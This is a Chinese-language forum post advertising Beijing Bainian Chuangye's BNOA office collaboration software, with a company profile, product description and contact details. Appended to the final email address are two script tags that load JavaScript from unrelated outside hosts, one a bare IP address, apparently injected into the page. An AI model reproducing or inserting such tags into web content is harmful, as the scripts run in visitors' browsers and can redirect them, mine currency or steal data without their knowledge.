你在这里

OA新领袖,百年新协同管理平台

1 post / 0 new
OA新领袖,百年新协同管理平台

1.公司简介
北京百年创业技术有限公司(简称:百年创业)是部分国内早期从事管理软件研发的精英人员,组建的一家以管理软件研发推广为主发展方向,致力于知识型信息化解决方案研究,现以成为OA软件领域新领袖的高新技术企业。公司以“百川海纳,年轻无畏,创新永远,业精于勤”的创业理念,在管理软件发展的新形势下,基于技术、管理、咨询、信息化建设展开四位一体的“有形服务”,确保服务过程中展现的技术是用户所想,管理是用户所要,咨询是用户所需,信息化建设是用户所爱的全新管理软件服务模式,全力创新出适合中国用户管理软件服务新标准。
2.产品介绍
百年新协同办公管理平台(BNOA)是北京百年创业技术有限公司研发的新一代旗舰产品,它以“管人理论”为核心,在国内知名管理咨询管理专家学者指导下,结合百年创业对国内外各类管理软件多年深度观察,并适度整合一线用户提出的新需求、新想法,融合适合中国国情的管理思想和方法于新系统中。这一新产品的创新,是百年创业在国内OA的首创,并将促进OA产品的新发展。其显著特点可以简要概括为“体现管理意志,满足管理变化,吻合管理制度,透视管理人文,强化管理要素”,是用户实现办公管理的上佳武器。
3.百年联系方式
电话:010-51265611 62351657
百年网址:[url]http://www.e80.com.cn[/url]
商务传真:010-51265611-808
商务邮件:services@vip.sina.com<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>